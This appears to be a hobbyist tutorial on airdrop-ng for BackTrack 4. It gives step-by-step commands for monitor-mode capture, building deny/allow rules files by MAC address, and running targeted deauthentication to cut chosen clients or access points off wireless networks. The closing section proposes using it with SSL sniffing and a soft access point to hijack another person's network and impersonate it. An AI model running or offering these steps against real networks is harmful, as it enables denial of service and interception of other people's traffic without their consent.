"Airbomb"

Airdrop-ng tutorial - Rule Based Deauth

This tutorial is based in backtrack4 and i'll assume you are competent with linux to the standard this tutorial requires. You must also have a packet injection/monitor mode supported wireless interface.

Capturing Your Surrounding's
First we need to capture the wireless activity in the area.

airmon-ng [to check the interface you will be using]
airmon-ng start wlan0 [starts the interface 'wlan0', change it accordingly]
airodump-ng mon0 -w capture --output-format csv ['mon0' is your interface in monitor mode, and csv is the output filetype of the captured information with a filename in this example of 'capture']

This step you can do previous to capturing the file if you have a specific target you know the MAC address of, but normally is done afterwards so you can review the output in the terminal of airodump-ng [last command above].

MAC Rules Info
We need to understand a basic formula for how the 'rules' work within airdrop-ng, a = allow whereas d = deny, I know rocket science isn't it lol. This is where it gets to the good bit. The format of each rule whether it's allow or deny access is allow(a) or deny(d) then bssid's MAC followed by the client's MAC. Below are example of how it would look.


Allow rule: a/bssid MAC ['any']|slave's MAC ['any']

Deny rule: d/bssid MAC ['any']|slave's MAC ['any']

However, you may wonder what the 'any' is for. Well if you decide you don't want anyone to connect to a bssid then you would put this for example:

d/00:11:22:33:44:55|any [00:11:22:33:44:55 being the bssid you wish to alienate]

To do the opposite and allow a MAC to not connect to anything:

d/any|00:11:22:33:44:55 [00:11:22:33:44:55 being in this example the client you wish to block.

Implementing MAC Rules
To put the rules in place we need to setup a 'rules' file which airdrop will read and implement the rules from. To add rules to the file we do so thus:

echo '#D' > rules && echo 'd/any|xy:xy:xy:xy:xy:xy' >> rules [this command will create the file 'rules' on your desktop and enter the above rule under the heading '#D']

The contents will look like this [remember i'm using D to remind you this is Deny!!
#D
d/any|xy:xy:xy:xy:xy:xy

Running Airdrop-ng
Installing Airdrop through synaptic is what i'll advise you to do as it places everything in the right place for you to follow this tutorial. Navigate using terminal to the airdrop directory:
cd /pentest/wireless/airdrop-ng/

Once there we start airdrop-ng:
airdrop-ng -i mon0 -t /capture.csv -r /rules [-i = interface, -t = capture file and -r = rules file. You can also run a rule debugging mode which is activated by using -b after rules e.g. airdrop-ng -i mon0 -t /capture.csv -r /rules -b]

We next have to understand a very important concept in the rules file reading process done by airdrop-ng. The program reads from top to bottom so allow rules applying to a specific MAC but come before deny rules applying to the same MAC. Using another example i'll demonstrate.

#D
d/xy:xy:xy:xy:xy:xy|any [we've now blocked all access to a AP/bssid, but then we decide we want a specific MAC only to connect to it. This must but done as shown below].

#A
a/xy:xy:xy:xy:xy:xy|yz:yz:yz:yz:yz:yz
#D
d/xy:xy:xy:xy:xy:xy|any

As you can see above our original rule of denying every connection to the AP is below the rule to grant/allow access to the one MAC/client. This must be done in this format!! To make alterations to the rules file use for following command:

nano rules [you can use other text editor's but I prefer nano, it's down to personal preference]

Note: alot of cases have been reported on a few forums of airdrop not responding to more than the 1st allow rule. So have one allow and the rest denials.

OUI [Organizationally Unique Identifier] Hardware names
Airdop also had the function to allow or deny based on the OUI and hardware names [but not to the same extent]. It is implmented in the same way as the MAC's, I won't be giving out a tutorial on this part because it's had hit and miss results and i've not personally tried it only the MAC deauth.
However, the OUI list is located below:
nano /pentest/wireless/airdrop-ng/support/oui.txt

To update the OUI list use:
airdrop-ng -u

How does this tutorial help you?
If you combine my other tutorial on SSL sniffing and SoftAP's with this, you could hijack someones AP, route traffic through your softAP using their connection, ban all access to the original AP and palm your AP off as the original using the airdrop-ng rule system.